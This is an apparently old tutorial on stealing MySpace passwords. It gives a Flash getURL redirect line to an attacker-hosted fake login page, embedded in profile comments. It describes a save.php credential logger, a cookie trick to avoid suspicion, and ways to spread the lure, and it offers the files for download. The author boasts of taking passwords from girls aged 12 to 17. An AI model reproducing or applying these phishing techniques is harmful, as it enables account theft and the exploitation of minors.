|
Myspace is one of the most popular sources to date for exposing one's lifestyle to the world. Its popularity has grown at rapid rates ever since the addition of celebrities. Amazing statistics show that that many users are not just adults, but most teenagers! And the amount of illegal myspace users (underage) is also skyrocketing as a trend. Psychology: Picture yourself many friends and reputations from the use of myspace. People between the age of 13-17 especially, provide a lot of themselves into myspace. Consider the advertisement and publicity. Celebrities, friends, and anyone else you can think of. So what could go wrong? The main reason for simple myspace hacks (without brute forcing) is simple psychology. Consider the following technique… Myspace has not yet disabled the use of html embed codes. Therefore, not a long time ago (before users were able to check user comments with scripting) a comment could be placed easily on a profile. The comment could say anything, yet in the background have embed redirect codes. A common known method which has now led the Myspace staff to post security warnings involves creating an SWF flash executable with the following codes… getURL("http://yoursite.com/myspace/index.htm??fuseaction=user&Mytoken=EC5EF149-2D07-2834-DD00AC141710F4F973BF1041", "_parent", "GET"); Of course the fake login screen is identical to the login screen you receive when trying to look at non-public friend information when you are not logged in, such as pictures. This fake login screen is uploaded to the personal website server along with some other codes. These codes are located in the other file (usually named) save.php which has codes that log the input in the text boxes and write them to a file on the server. When the user clicks login, besides the input being logged, they are redirected to their normal home control panel as if they logged in. Now this might anger the user, because they don’t get to see the pictures or whatever, but it’s too late for them, the password is retrieved. Now hold on……this is way too simple and can barely be considered hacking it is no more than a simple script kiddy. But why is it genius? Why have “people” received so much luck in catching passwords? The answer is psychology, the true art of Trojan hacking. Average myspace users see that login page approximately 30% or more of the time they are engaged in myspace. So when a simple redirect to see a profile page occurs, the user does not even CONSIDER that this is a flaw in myspace. It is nothing more than standard procedure. In a study of seven 12-17 girls conducted by myself, all but one did not notice a change or anomaly in the procedure (except of course the fact that they did not see the picture. (methods of this issue have also been fixed by adding in the Redirect flash codes the installation of a cookie so this procedure happens only once to make the process even more believable). The one that noticed this problem is the one that used a different browser that caught and asked for redirect codes. The study then continued to see how many tried again and gave up. The 6 original testers all tried again at least once. How do I know none of them figured it out? None of them bothered to change their passwords J And because this redirect comment is on one’s own myspace profile, other techniques such as just attempting to become a myspace friend stimulates the receiver to just view the profile which already promises some results depending on the user. Or…placing the redirect comment on a frequently visited profile gets a lot of viewers’ (besides the victim) passwords as well. Now this behavior obviously has not gone unnoticed. Tom has taken steps to remedy this. First of all he implemented this…..  This catches a lot of users, but over time, they adapt. People have caught users today with and without that warning in the fake login screen. However over time, that warning will become acustom to their eyes and will be noticed if the login screen is not the same. But this shows once again the disregard and trust in myspace for safety. The friend request method has also been taken action upon, now, to have a friend request (to stimulate checking the redirecting profile) Myspace has implemented that you must know either the email of the new friend or their last name. In conclusion, myspace has taken steps to fix hacking, yet will never offer the proper means to provide complete security. I find the most interesting in this is the psychology, one of the most important factors in user deceiving related hacking. Example: http://www.myspace.com/secretpimpsociety1 Go ahead and type me a something. These files to perform this action can be obtained here
Email:
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
Related Items:
|
